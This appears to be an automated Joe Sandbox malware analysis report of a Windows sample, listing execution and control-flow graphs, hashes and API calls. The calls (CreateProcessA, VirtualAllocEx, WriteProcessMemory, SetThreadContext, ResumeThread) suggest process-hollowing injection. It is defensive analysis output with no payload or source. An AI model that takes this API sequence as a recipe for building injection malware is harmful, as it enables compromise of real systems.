                                                                                      execution_graph 30138 a7a5a5 30141 a7a2f7 30138->30141 30142 a79ea0 30141->30142 30146 a79eac 30141->30146 30143 a7a7b8 OutputDebugStringW 30142->30143 30145 a7a864 30143->30145 30145->30141 30147 a7a8b0 CloseHandle 30146->30147 30149 a7a940 30147->30149 30149->30141 30257 4a9060a 30258 4a905f5 30257->30258 30260 8f3de91 WriteProcessMemory 30258->30260 30261 8f3de98 WriteProcessMemory 30258->30261 30259 4a90aaa 30260->30259 30261->30259 30150 23f8638 30151 23f8664 GetCurrentProcess 30150->30151 30153 23f86c9 30151->30153 30154 23f86d0 GetCurrentThread 30151->30154 30153->30154 30155 23f870d GetCurrentProcess 30154->30155 30156 23f8706 30154->30156 30157 23f8743 30155->30157 30156->30155 30158 23f876b GetCurrentThreadId 30157->30158 30159 23f879c 30158->30159 30269 23f1478 30270 23f14a2 30269->30270 30274 23f2110 30270->30274 30280 23f2100 30270->30280 30271 23f1577 30276 23f2116 30274->30276 30275 23f216e 30275->30271 30276->30275 30286 23f22a8 30276->30286 30291 23f2297 30276->30291 30277 23f2225 30277->30271 30282 23f2104 30280->30282 30281 23f216e 30281->30271 30282->30281 30284 23f22a8 2 API calls 30282->30284 30285 23f2297 2 API calls 30282->30285 30283 23f2225 30283->30271 30284->30283 30285->30283 30287 23f22c9 30286->30287 30296 23f2353 30287->30296 30301 23f2360 30287->30301 30288 23f2302 30288->30277 30292 23f229c 30291->30292 30294 23f2353 2 API calls 30292->30294 30295 23f2360 2 API calls 30292->30295 30293 23f2302 30293->30277 30294->30293 30295->30293 30297 23f235a 30296->30297 30298 23f2405 30297->30298 30306 23f37b0 30297->30306 30310 23f37c0 30297->30310 30298->30288 30302 23f2393 30301->30302 30303 23f2405 30302->30303 30304 23f37b0 2 API calls 30302->30304 30305 23f37c0 2 API calls 30302->30305 30303->30288 30304->30303 30305->30303 30308 23f37b4 30306->30308 30307 23f3741 30307->30298 30308->30307 30314 23f7f58 30308->30314 30312 23f37eb 30310->30312 30311 23f3ab1 30311->30298 30312->30311 30313 23f7f58 2 API calls 30312->30313 30313->30311 30316 23f7f68 30314->30316 30315 23f7fad 30315->30307 30316->30315 30319 23f8511 30316->30319 30323 23f8520 30316->30323 30320 23f851c 30319->30320 30321 23f8567 30320->30321 30327 23f8328 30320->30327 30321->30315 30324 23f8526 30323->30324 30325 23f8328 2 API calls 30324->30325 30326 23f8567 30324->30326 30325->30326 30326->30315 30328 23f8333 30327->30328 30330 23f8ee8 30328->30330 30331 23f8454 30328->30331 30330->30330 30332 23f845f 30331->30332 30335 23facdc 30332->30335 30336 23f8f91 30335->30336 30337 23facf5 30335->30337 30336->30330 30338 23fade1 30337->30338 30341 23fbb78 30337->30341 30348 23fbb88 30337->30348 30342 23fbb7c 30341->30342 30343 23f9368 CreateWindowExW CreateWindowExW 30342->30343 30344 23fbc1a 30343->30344 30346 23fc038 CreateWindowExW CreateWindowExW 30344->30346 30347 23f9368 CreateWindowExW CreateWindowExW 30344->30347 30345 23fbc36 30346->30345 30347->30345 30349 23fbb8a 30348->30349 30350 23f9368 CreateWindowExW CreateWindowExW 30349->30350 30351 23fbc1a 30350->30351 30353 23fc038 CreateWindowExW CreateWindowExW 30351->30353 30354 23f9368 CreateWindowExW CreateWindowExW 30351->30354 30352 23fbc36 30353->30352 30354->30352 30412 23f6158 30416 23f6243 30412->30416 30422 23f6250 30412->30422 30413 23f6167 30417 23f61f0 30416->30417 30420 23f624a 30416->30420 30417->30413 30418 23f6284 30418->30413 30419 23f64a5 GetModuleHandleW 30421 23f64e4 30419->30421 30420->30418 30420->30419 30421->30413 30423 23f6284 30422->30423 30424 23f6261 30422->30424 30423->30413 30424->30423 30425 23f64a5 GetModuleHandleW 30424->30425 30426 23f64e4 30425->30426 30426->30413 30355 4a904e0 30359 8f3dd70 30355->30359 30363 8f3dd78 30355->30363 30356 4a90502 30360 8f3dd78 VirtualAllocEx 30359->30360 30362 8f3de34 30360->30362 30362->30356 30364 8f3ddbc VirtualAllocEx 30363->30364 30366 8f3de34 30364->30366 30366->30356 30367 4a90ee0 30368 4a90f06 30367->30368 30369 4a9106b 30367->30369 30368->30369 30372 4a911b8 PostMessageW 30368->30372 30374 4a911b0 30368->30374 30373 4a91265 30372->30373 30373->30368 30375 4a911b8 PostMessageW 30374->30375 30376 4a91265 30375->30376 30376->30368 30377 23ff671 30378 23ff68d 30377->30378 30379 23ff78c 30378->30379 30380 23ff6e2 30378->30380 30381 23fc2fc CallWindowProcW 30379->30381 30382 23ff73a CallWindowProcW 30380->30382 30383 23ff6e9 30380->30383 30381->30383 30382->30383 30160 4a90626 30164 8f3de91 30160->30164 30168 8f3de98 30160->30168 30161 4a905a1 30165 8f3dee4 WriteProcessMemory 30164->30165 30167 8f3df7d 30165->30167 30167->30161 30169 8f3dee4 WriteProcessMemory 30168->30169 30171 8f3df7d 30169->30171 30171->30161 30384 a78468 30385 a784b5 VirtualProtect 30384->30385 30386 a78521 30385->30386 30427 a70848 30428 a7085c 30427->30428 30429 a70898 30428->30429 30431 a78570 30428->30431 30433 a78594 30431->30433 30432 a78629 30432->30428 30433->30432 30436 a794b0 30433->30436 30440 a79488 30433->30440 30437 a794c7 30436->30437 30444 a794e7 30437->30444 30441 a794c7 30440->30441 30443 a794e7 NtQueryInformationProcess 30441->30443 30442 a794db 30442->30433 30443->30442 30445 a79518 30444->30445 30449 a79558 30445->30449 30453 a79547 30445->30453 30446 a794db 30446->30433 30451 a7957c 30449->30451 30450 a79679 30450->30446 30451->30450 30457 a707f4 30451->30457 30455 a7957c 30453->30455 30454 a79679 30454->30446 30455->30454 30456 a707f4 NtQueryInformationProcess 30455->30456 30456->30455 30458 a79758 NtQueryInformationProcess 30457->30458 30460 a7981f 30458->30460 30460->30451 30262 4a90498 30263 4a9049c 30262->30263 30265 8f3dc50 Wow64SetThreadContext 30263->30265 30266 8f3dc48 Wow64SetThreadContext 30263->30266 30264 4a904b7 30265->30264 30266->30264 30461 4a902da 30462 4a9086b 30461->30462 30466 8f3dff0 30462->30466 30470 8f3dfe8 30462->30470 30463 4a906a3 30467 8f3e03c ReadProcessMemory 30466->30467 30469 8f3e0b4 30467->30469 30469->30463 30471 8f3e03c ReadProcessMemory 30470->30471 30473 8f3e0b4 30471->30473 30473->30463 30387 4a901ff 30391 8f3e220 30387->30391 30395 8f3e214 30387->30395 30392 8f3e2a7 CreateProcessA 30391->30392 30394 8f3e4fc 30392->30394 30394->30394 30396 8f3e2a7 CreateProcessA 30395->30396 30398 8f3e4fc 30396->30398 30398->30398 30172 80d01c 30174 80d034 30172->30174 30173 80d08e 30174->30173 30182 23fc2fc 30174->30182 30186 23fc2ec 30174->30186 30190 23fd330 30174->30190 30194 23fd387 30174->30194 30202 23fdfe8 30174->30202 30206 23fd1c8 30174->30206 30212 23fd1b8 30174->30212 30183 23fc307 30182->30183 30185 23fe049 30183->30185 30218 23fc424 CallWindowProcW 30183->30218 30185->30185 30187 23fc2f7 30186->30187 30219 23fc324 30187->30219 30189 23fd347 30189->30173 30191 23fd340 30190->30191 30192 23fc324 2 API calls 30191->30192 30193 23fd347 30192->30193 30193->30173 30195 23fd38c 30194->30195 30198 23fd317 30194->30198 30197 23f9368 2 API calls 30195->30197 30196 23fd323 30196->30173 30201 23fd3a9 30197->30201 30198->30196 30199 23fc324 2 API calls 30198->30199 30200 23fd347 30199->30200 30200->30173 30203 23fdff0 30202->30203 30205 23fe049 30203->30205 30238 23fc424 CallWindowProcW 30203->30238 30205->30205 30207 23fd1ca 30206->30207 30208 23fc2ec 2 API calls 30207->30208 30209 23fd1fa 30208->30209 30210 23fc2fc CallWindowProcW 30209->30210 30211 23fd20f 30210->30211 30211->30173 30213 23fd1bc 30212->30213 30214 23fc2ec 2 API calls 30213->30214 30215 23fd1fa 30214->30215 30216 23fc2fc CallWindowProcW 30215->30216 30217 23fd20f 30216->30217 30217->30173 30218->30185 30220 23fc32f 30219->30220 30223 23f9368 30220->30223 30222 23fd3a9 30224 23f9373 30223->30224 30224->30222 30225 23fc053 30224->30225 30228 23fc639 30224->30228 30233 23fc658 30224->30233 30225->30222 30230 23fc63e 30228->30230 30229 23fc8a8 30229->30225 30230->30229 30231 23fd064 CreateWindowExW 30230->30231 30232 23fd106 30231->30232 30235 23fc66d 30233->30235 30234 23fc8a8 30234->30225 30235->30234 30236 23fd064 CreateWindowExW 30235->30236 30237 23fd106 30236->30237 30238->30205 30239 4a906b7 30240 4a906c6 30239->30240 30244 8f3dc50 30240->30244 30248 8f3dc48 30240->30248 30241 4a9047c 30245 8f3dc99 Wow64SetThreadContext 30244->30245 30247 8f3dd11 30245->30247 30247->30241 30249 8f3dc50 Wow64SetThreadContext 30248->30249 30251 8f3dd11 30249->30251 30251->30241 30399 4a90577 30400 4a903e5 30399->30400 30404 8f3d725 30400->30404 30408 8f3d728 30400->30408 30401 4a90411 30405 8f3d728 ResumeThread 30404->30405 30407 8f3d7b8 30405->30407 30407->30401 30409 8f3d76c ResumeThread 30408->30409 30411 8f3d7b8 30409->30411 30411->30401 30267 23f8880 DuplicateHandle 30268 23f895d 30267->30268 30474 23f0040 30475 23f0042 CreateActCtxA 30474->30475 30477 23f0146 30475->30477
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00A7980D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 1778838933-0
                                                                                      • Opcode ID: 21cb29263d5f0d418ea2a5f543f817e2b2b7adc4157ba9448215d79487697700
                                                                                      • Instruction ID: 18d9c267c33f982a29223f3349430bef5063f7656edd74c56a21278a0e85a8de
                                                                                      • Opcode Fuzzy Hash: 21cb29263d5f0d418ea2a5f543f817e2b2b7adc4157ba9448215d79487697700
                                                                                      • Instruction Fuzzy Hash: CC4157B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE918B7310D375A945CF65
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00A7980D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 1778838933-0
                                                                                      • Opcode ID: 3fed1d9f12d34cfb861790c7655043e2159c2763e22f7196f5f7043ca9513979
                                                                                      • Instruction ID: 76f598f9d6fbfd4917ad5fa0a4e0fd4168d2a81fe2df01b72375ad478af94318
                                                                                      • Opcode Fuzzy Hash: 3fed1d9f12d34cfb861790c7655043e2159c2763e22f7196f5f7043ca9513979
                                                                                      • Instruction Fuzzy Hash: EF4169B9D042589FCF14CFA9D984ADEFBB1BB1A310F10902AE818B7350D375A945CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 484 8f3e214-8f3e2b9 486 8f3e302-8f3e32a 484->486 487 8f3e2bb-8f3e2d2 484->487 490 8f3e370-8f3e3c6 486->490 491 8f3e32c-8f3e340 486->491 487->486 492 8f3e2d4-8f3e2d9 487->492 499 8f3e3c8-8f3e3dc 490->499 500 8f3e40c-8f3e4fa CreateProcessA 490->500 491->490 501 8f3e342-8f3e347 491->501 493 8f3e2db-8f3e2e5 492->493 494 8f3e2fc-8f3e2ff 492->494 496 8f3e2e7 493->496 497 8f3e2e9-8f3e2f8 493->497 494->486 496->497 497->497 502 8f3e2fa 497->502 499->500 509 8f3e3de-8f3e3e3 499->509 520 8f3e503-8f3e5e8 500->520 521 8f3e4fc-8f3e502 500->521 503 8f3e36a-8f3e36d 501->503 504 8f3e349-8f3e353 501->504 502->494 503->490 506 8f3e357-8f3e366 504->506 507 8f3e355 504->507 506->506 510 8f3e368 506->510 507->506 511 8f3e406-8f3e409 509->511 512 8f3e3e5-8f3e3ef 509->512 510->503 511->500 514 8f3e3f3-8f3e402 512->514 515 8f3e3f1 512->515 514->514 516 8f3e404 514->516 515->514 516->511 533 8f3e5ea-8f3e5ee 520->533 534 8f3e5f8-8f3e5fc 520->534 521->520 533->534 535 8f3e5f0 533->535 536 8f3e5fe-8f3e602 534->536 537 8f3e60c-8f3e610 534->537 535->534 536->537 538 8f3e604 536->538 539 8f3e612-8f3e616 537->539 540 8f3e620-8f3e624 537->540 538->537 539->540 541 8f3e618 539->541 542 8f3e626-8f3e64f 540->542 543 8f3e65a-8f3e665 540->543 541->540 542->543 546 8f3e666 543->546 546->546
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F3E4E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: 6 $6 $6
                                                                                      • API String ID: 963392458-1352605413
                                                                                      • Opcode ID: 8b5974545a426243c776a610bf8afbccd0add2c42f83d6923f4eb2671e4c9b6b
                                                                                      • Instruction ID: 87a2dd3936df90de64b623006f377e75dc5bf6bb7e105b6d2c4c77cb6c1c1ccc
                                                                                      • Opcode Fuzzy Hash: 8b5974545a426243c776a610bf8afbccd0add2c42f83d6923f4eb2671e4c9b6b
                                                                                      • Instruction Fuzzy Hash: 76C137B1D00229CFDB24CFA8C845BEEBBB1BF49301F0095AAD459B7640DB749A85CF95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 548 8f3e220-8f3e2b9 550 8f3e302-8f3e32a 548->550 551 8f3e2bb-8f3e2d2 548->551 554 8f3e370-8f3e3c6 550->554 555 8f3e32c-8f3e340 550->555 551->550 556 8f3e2d4-8f3e2d9 551->556 563 8f3e3c8-8f3e3dc 554->563 564 8f3e40c-8f3e4fa CreateProcessA 554->564 555->554 565 8f3e342-8f3e347 555->565 557 8f3e2db-8f3e2e5 556->557 558 8f3e2fc-8f3e2ff 556->558 560 8f3e2e7 557->560 561 8f3e2e9-8f3e2f8 557->561 558->550 560->561 561->561 566 8f3e2fa 561->566 563->564 573 8f3e3de-8f3e3e3 563->573 584 8f3e503-8f3e5e8 564->584 585 8f3e4fc-8f3e502 564->585 567 8f3e36a-8f3e36d 565->567 568 8f3e349-8f3e353 565->568 566->558 567->554 570 8f3e357-8f3e366 568->570 571 8f3e355 568->571 570->570 574 8f3e368 570->574 571->570 575 8f3e406-8f3e409 573->575 576 8f3e3e5-8f3e3ef 573->576 574->567 575->564 578 8f3e3f3-8f3e402 576->578 579 8f3e3f1 576->579 578->578 580 8f3e404 578->580 579->578 580->575 597 8f3e5ea-8f3e5ee 584->597 598 8f3e5f8-8f3e5fc 584->598 585->584 597->598 599 8f3e5f0 597->599 600 8f3e5fe-8f3e602 598->600 601 8f3e60c-8f3e610 598->601 599->598 600->601 602 8f3e604 600->602 603 8f3e612-8f3e616 601->603 604 8f3e620-8f3e624 601->604 602->601 603->604 605 8f3e618 603->605 606 8f3e626-8f3e64f 604->606 607 8f3e65a-8f3e665 604->607 605->604 606->607 610 8f3e666 607->610 610->610
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F3E4E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: 6 $6 $6
                                                                                      • API String ID: 963392458-1352605413
                                                                                      • Opcode ID: 8cbaba233f1c5f4dd6f21229752ccfd93c76f18f73210b665880e3eb6b2cde5d
                                                                                      • Instruction ID: 8ed5eb21c7d1626aa89e91cfa83a7ffc91e2d0a06b415f60c508dfe9fe12c0a6
                                                                                      • Opcode Fuzzy Hash: 8cbaba233f1c5f4dd6f21229752ccfd93c76f18f73210b665880e3eb6b2cde5d
                                                                                      • Instruction Fuzzy Hash: DAC106B1D00229CFDB24CFA8C845BEEBBB1BF49301F0095AAD459B7640DB749A85CF95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 612 23f8628-23f862a 613 23f862c-23f8630 612->613 614 23f8632-23f8634 612->614 613->614 616 23f8636-23f8661 614->616 617 23f8664-23f86c7 GetCurrentProcess 614->617 616->617 622 23f86c9-23f86cf 617->622 623 23f86d0-23f8704 GetCurrentThread 617->623 622->623 624 23f870d-23f8741 GetCurrentProcess 623->624 625 23f8706-23f870c 623->625 627 23f874a-23f8765 call 23f8808 624->627 628 23f8743-23f8749 624->628 625->624 630 23f876b-23f879a GetCurrentThreadId 627->630 628->627 632 23f879c-23f87a2 630->632 633 23f87a3-23f8805 630->633 632->633
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 023F86B6
                                                                                      • GetCurrentThread.KERNEL32 ref: 023F86F3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 023F8730
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 023F8789
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 7bd9a21c3e85e8c48e2234a66d191078ff7b30957668ec3bd214f08162d81e86
                                                                                      • Instruction ID: 32d80b1be221fd87eea0978a01da2e056c8512abbe1a6c7f3de2cbc904d7bc44
                                                                                      • Opcode Fuzzy Hash: 7bd9a21c3e85e8c48e2234a66d191078ff7b30957668ec3bd214f08162d81e86
                                                                                      • Instruction Fuzzy Hash: 0E5199B0901349CFDB48DFAAE948BEEBBF2EF48314F208459E109A7361D7345948CB65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 640 23f8638-23f86c7 GetCurrentProcess 645 23f86c9-23f86cf 640->645 646 23f86d0-23f8704 GetCurrentThread 640->646 645->646 647 23f870d-23f8741 GetCurrentProcess 646->647 648 23f8706-23f870c 646->648 650 23f874a-23f8765 call 23f8808 647->650 651 23f8743-23f8749 647->651 648->647 653 23f876b-23f879a GetCurrentThreadId 650->653 651->650 655 23f879c-23f87a2 653->655 656 23f87a3-23f8805 653->656 655->656
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 023F86B6
                                                                                      • GetCurrentThread.KERNEL32 ref: 023F86F3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 023F8730
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 023F8789
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: ab3833ac3397fb9baf0365d59540e434eaa9c8e7924ab98d08ee1c70fcd3d7e7
                                                                                      • Instruction ID: 9f2f5fe37fa58179a0f3219c666b7ffddaff535959084d5f757a04a372f5041f
                                                                                      • Opcode Fuzzy Hash: ab3833ac3397fb9baf0365d59540e434eaa9c8e7924ab98d08ee1c70fcd3d7e7
                                                                                      • Instruction Fuzzy Hash: B55156B0901349CFDB58DFAAD948BAEBBF2EF88314F208459E109A73A0D7345944CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 663 23fc658-23fc67e 666 23fc6ae-23fc6b6 663->666 667 23fc680-23fc6a8 call 23f5edc call 23f5f34 663->667 669 23fc6fc-23fc736 call 23fc260 666->669 670 23fc6b8-23fc6bd call 23fc254 666->670 667->666 677 23fc8b4-23fc8db 667->677 687 23fc73c-23fc787 669->687 688 23fc8e2-23fc914 669->688 675 23fc6c2-23fc6f7 670->675 684 23fc78a-23fc78c 675->684 677->688 753 23fc78f call 23fca58 684->753 754 23fc78f call 23fca60 684->754 687->684 704 23fc91b-23fd104 CreateWindowExW 688->704 689 23fc795-23fc7e3 call 23f5edc call 23fc26c 711 23fc7e8-23fc7ec 689->711 724 23fd10d-23fd178 704->724 725 23fd106-23fd10c 704->725 713 23fc8a8-23fc8b3 711->713 714 23fc7f2-23fc7ff 711->714 718 23fc805-23fc832 call 23f5edc call 23fc260 714->718 719 23fc8a4-23fc8a6 714->719 718->719 735 23fc834-23fc841 718->735 719->704 719->713 732 23fd17a-23fd17d 724->732 733 23fd185 724->733 725->724 732->733 736 23fd186 733->736 735->719 737 23fc843-23fc85a call 23f5edc call 23fc278 735->737 736->736 742 23fc85c-23fc865 call 23fc26c 737->742 743 23fc867-23fc896 call 23fc26c 737->743 742->719 743->719 751 23fc898-23fc8a2 743->751 751->719 751->743 753->689 754->689
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 023FD0F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID: 0$Crp^
                                                                                      • API String ID: 716092398-3462751211
                                                                                      • Opcode ID: 4086f1103428ea99bd94f80499f4d05154d8b992452689744545df7beb40113b
                                                                                      • Instruction ID: e40a8348ddf412f6eb80899311ab57d9eca507e58a7a5498cda925fa552435ff
                                                                                      • Opcode Fuzzy Hash: 4086f1103428ea99bd94f80499f4d05154d8b992452689744545df7beb40113b
                                                                                      • Instruction Fuzzy Hash: 3EC12A74A007199FCB54DFA9D884A9EBBF2FF88300F10896AD50ADB351DB74A945CF90
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A7850F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: ca3f48328df076438a47191f131cfcbe24712e8864792c840502e3f74cd740a4
                                                                                      • Instruction ID: 08fb7685490dd17a52e87d8d3a13ba815377c8372f7d6bb0953c5f5df6621fcc
                                                                                      • Opcode Fuzzy Hash: ca3f48328df076438a47191f131cfcbe24712e8864792c840502e3f74cd740a4
                                                                                      • Instruction Fuzzy Hash: 3AD1C16594EBC89FCB128B74CE6A198BFB1BE12214F09C4EFC89417D93D6680497CB43
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(?), ref: 023F64D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: aefff3340e093f11449f1d1ca6e0ec9a717a933a962666e02d8dd8ae52635228
                                                                                      • Instruction ID: 3766472f2223918198b7a5a7762ea06d014b7573a824990ae54bd329d22d8dfc
                                                                                      • Opcode Fuzzy Hash: aefff3340e093f11449f1d1ca6e0ec9a717a933a962666e02d8dd8ae52635228
                                                                                      • Instruction Fuzzy Hash: 7D913370A00B198FCB64CF69E54579ABBF6FF48304F00892AE55AE7A50D730E945CF90
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023F0131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: db19ae35395888d8ceeec611c2ba878e2fb1875bac1559263d1aa6713c215328
                                                                                      • Instruction ID: ebeefbfdba22904dcae45376eaf6261bc9cb48612c447157325e9fb471d2d97d
                                                                                      • Opcode Fuzzy Hash: db19ae35395888d8ceeec611c2ba878e2fb1875bac1559263d1aa6713c215328
                                                                                      • Instruction Fuzzy Hash: 63511AB4D043598FDB21CFA8C845BDEBBF5AF46300F1080AAD549AB252DB716949CF91
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023F0131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: dac0b74e7a851d8fa6e97f49e545794cafa7bceb5dd493cc1732889ecd117cab
                                                                                      • Instruction ID: 6370979a0d9871d4eb1e5db7b02b38fd263ec393443761c6a830559048e8dafa
                                                                                      • Opcode Fuzzy Hash: dac0b74e7a851d8fa6e97f49e545794cafa7bceb5dd493cc1732889ecd117cab
                                                                                      • Instruction Fuzzy Hash: F351E5B4D002198FDB24DFA8C845BDEBBF5AF49300F1080AAD509BB251DB716A89CF91
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3DF6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: f08e757a2710e68d2aaaf139f8d18893c86153f2d60c0fb5fab7208d83505736
                                                                                      • Instruction ID: ecc97cc41862fdf9f6f89328f776c3d7b92afbd509804397711a2b36b3bd82da
                                                                                      • Opcode Fuzzy Hash: f08e757a2710e68d2aaaf139f8d18893c86153f2d60c0fb5fab7208d83505736
                                                                                      • Instruction Fuzzy Hash: 564199B5D012589FCB00DFA9D984AEEFBF1BF49310F24902AE419B7250D735AA46CF64
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3DF6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: 40f267123cca6ab138eb296d490dc0d03a7dc0aa8c6d19b9efdd06546dc89a92
                                                                                      • Instruction ID: 7f4e4f6ac4a0a90483c2060079bb98ac7463f495ff754d2252f2c2b31833198e
                                                                                      • Opcode Fuzzy Hash: 40f267123cca6ab138eb296d490dc0d03a7dc0aa8c6d19b9efdd06546dc89a92
                                                                                      • Instruction Fuzzy Hash: 9A4198B5D012589FCF00DFA9D984AEEFBF1BB49310F20902AE818B7250D735AA45CF64
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023F894B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
